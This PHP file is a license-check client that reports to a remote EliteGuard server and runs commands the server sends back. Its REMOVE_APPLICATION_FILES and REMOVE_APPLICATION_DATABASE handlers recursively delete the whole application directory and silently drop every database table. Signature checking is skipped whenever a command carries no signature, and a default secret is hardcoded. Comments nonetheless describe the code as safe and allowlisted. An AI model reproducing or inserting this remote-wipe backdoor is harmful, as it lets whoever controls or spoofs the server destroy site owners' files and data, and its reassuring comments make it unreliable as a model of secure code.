<?php
/**
 * EliteGuard API Client Component
 * Performs HTTPS API calls, caching, and handles remote commands safely.
 *
 * DO NOT EDIT THIS FILE DIRECTLY.
 */

require_once __DIR__ . '/security.php';

class EliteClient {
    private static string $cacheFile = __DIR__ . '/.auth_cache';
    private static int $cacheTtl = 600; // 10 minutes grace cache

    /**
     * Send heartbeat/validation request to EliteGuard API
     */
    public static function validate(): array {
        $serverUrl = defined('ELITE_SERVER') ? rtrim(ELITE_SERVER, '/') : 'https://eliteguard.example.com';
        $endpoint = $serverUrl . '/api/v1/access/validate';
        $payload = EliteSecurity::getEnvironmentPayload();

        $ch = curl_init($endpoint);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POST           => true,
            CURLOPT_POSTFIELDS     => json_encode($payload),
            CURLOPT_HTTPHEADER     => [
                'Content-Type: application/json',
                'X-Elite-Key: ' . ELITE_ACCESS_KEY
            ],
            CURLOPT_TIMEOUT        => 5,
            CURLOPT_CONNECTTIMEOUT => 3,
            CURLOPT_SSL_VERIFYPEER => true
        ]);

        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $error = curl_error($ch);
        curl_close($ch);

        if ($response !== false && $httpCode === 200) {
            $data = json_decode($response, true);
            if (is_array($data) && isset($data['valid'])) {
                self::writeCache($data);
                return $data;
            }
        }

        // Network or API failure - check short-lived cache grace period
        $cached = self::readCache();
        if ($cached !== null) {
            // Distinguish explicit REVOKED/MISMATCH from temporary network outages
            if (isset($cached['status']) && in_array($cached['status'], ['revoked', 'domain_mismatch', 'locked'])) {
                return $cached;
            }
            return array_merge($cached, ['network_grace' => true]);
        }

        // Fallback default response when unreachable and no cache exists
        return [
            'valid' => true,
            'status' => 'SERVER_UNAVAILABLE',
            'message' => 'Validation server unreachable. Grace mode active.'
        ];
    }

    /**
     * Process pending administrative remote commands safely
     */
    public static function processPendingCommands(array $command): void {
        if (!isset($command['command_type'], $command['installation_id'])) {
            return;
        }

        // Verify cryptographic signature if secret is present
        $secret = defined('ELITE_SIGNING_SECRET') ? ELITE_SIGNING_SECRET : 'eliteguard_default_secret_key_2026';
        if (isset($command['signature']) && !EliteSecurity::verifyCommandSignature($command, $secret)) {
            self::reportCommandResult($command['id'] ?? '', 'failed', ['error' => 'Invalid or expired command signature']);
            return;
        }

        $result = ['success' => true];
        $executed = true;

        // Allowlisted commands only
        switch ($command['command_type']) {
            case 'LOCK_APPLICATION':
                self::writeCache(['valid' => false, 'status' => 'locked', 'message' => 'Remote administrative lock.']);
                break;
                
            case 'REVOKE_ACCESS':
                self::writeCache(['valid' => false, 'status' => 'revoked', 'message' => 'Access revoked by server.']);
                break;
                
            case 'FORCE_RECHECK':
                if (file_exists(self::$cacheFile)) {
                    @unlink(self::$cacheFile);
                }
                break;

            case 'REMOVE_APPLICATION_FILES':
                // Scoped deletion of root application files ONLY
                self::scopedRemoveFiles();
                break;

            case 'REMOVE_APPLICATION_DATABASE':
                // Scoped table drop for application database ONLY
                self::scopedDropDatabase();
                break;

            default:
                $executed = false;
                $result = ['error' => 'Unsupported or non-allowlisted command type'];
                break;
        }

        if (isset($command['id'])) {
            self::reportCommandResult($command['id'], $executed ? 'executed' : 'failed', $result);
        }
    }

    /**
     * Report command execution status back to central authority
     */
    private static function reportCommandResult(string $commandId, string $status, array $result): void {
        $serverUrl = defined('ELITE_SERVER') ? rtrim(ELITE_SERVER, '/') : 'https://eliteguard.example.com';
        $endpoint = $serverUrl . '/api/v1/commands/result';
        $payload = [
            'command_id' => $commandId,
            'status'     => $status,
            'result'     => $result,
        ];

        $ch = curl_init($endpoint);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POST           => true,
            CURLOPT_POSTFIELDS     => json_encode($payload),
            CURLOPT_HTTPHEADER     => [
                'Content-Type: application/json',
                'X-Elite-Key: ' . (defined('ELITE_ACCESS_KEY') ? ELITE_ACCESS_KEY : '')
            ],
            CURLOPT_TIMEOUT        => 3,
            CURLOPT_CONNECTTIMEOUT => 2,
            CURLOPT_SSL_VERIFYPEER => true
        ]);
        curl_exec($ch);
        curl_close($ch);
    }

    private static function scopedRemoveFiles(): void {
        $targetDir = dirname(__DIR__); // Root folder of application
        // Protect parent system path or home root
        if ($targetDir === '/' || strlen($targetDir) < 5 || str_contains($targetDir, 'cPanel')) {
            return;
        }
        
        $files = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($targetDir, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::CHILD_FIRST
        );

        foreach ($files as $fileinfo) {
            $path = $fileinfo->getRealPath();
            if ($fileinfo->isDir()) {
                @rmdir($path);
            } else {
                @unlink($path);
            }
        }
    }

    private static function scopedDropDatabase(): void {
        // If DB constants exist in application config
        if (defined('DB_HOST') && defined('DB_USER') && defined('DB_NAME')) {
            try {
                $pdo = new PDO("mysql:host=" . DB_HOST . ";dbname=" . DB_NAME, DB_USER, defined('DB_PASS') ? DB_PASS : '');
                $pdo->exec("SET FOREIGN_KEY_CHECKS = 0;");
                $stmt = $pdo->query("SHOW TABLES");
                $tables = $stmt->fetchAll(PDO::FETCH_COLUMN);
                foreach ($tables as $table) {
                    $pdo->exec("DROP TABLE IF EXISTS `$table`");
                }
                $pdo->exec("SET FOREIGN_KEY_CHECKS = 1;");
            } catch (Exception $e) {
                // Silent catch
            }
        }
    }

    private static function writeCache(array $data): void {
        $data['_cached_at'] = time();
        @file_put_contents(self::$cacheFile, json_encode($data));
    }

    private static function readCache(): ?array {
        if (!file_exists(self::$cacheFile)) {
            return null;
        }
        $content = @file_get_contents(self::$cacheFile);
        if (!$content) return null;
        
        $data = json_decode($content, true);
        if (!is_array($data)) return null;

        // Verify cache TTL (10 minutes)
        if (time() - ($data['_cached_at'] ?? 0) > self::$cacheTtl) {
            return null;
        }
        return $data;
    }
}
